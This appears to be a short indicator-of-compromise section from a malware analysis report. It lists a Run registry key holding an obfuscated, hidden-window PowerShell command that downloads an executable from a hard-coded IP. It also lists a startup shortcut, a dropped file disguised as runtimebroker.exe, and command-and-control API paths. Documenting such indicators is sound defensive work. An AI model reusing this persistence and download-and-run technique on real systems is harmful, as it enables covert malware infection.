Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Sound device' = 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nt...
- %APPDATA%\microsoft\windows\start menu\programs\startup\sound device.lnk
- (http://19#.#6.146.55/ru+nti+m+ebr+oke+r.exe
- http://19#.#6.146.55/api/getfile2
- %ALLUSERSPROFILE%\runtimebroker.exe
- '19#.#6.146.55':80
- http://19#.#6.146.55/Api/GetTask/178BFBFF000406F1EBCAD34F
- '%ALLUSERSPROFILE%\runtimebroker.exe'
- '%ALLUSERSPROFILE%\runtimebroker.exe' ' (with hidden window)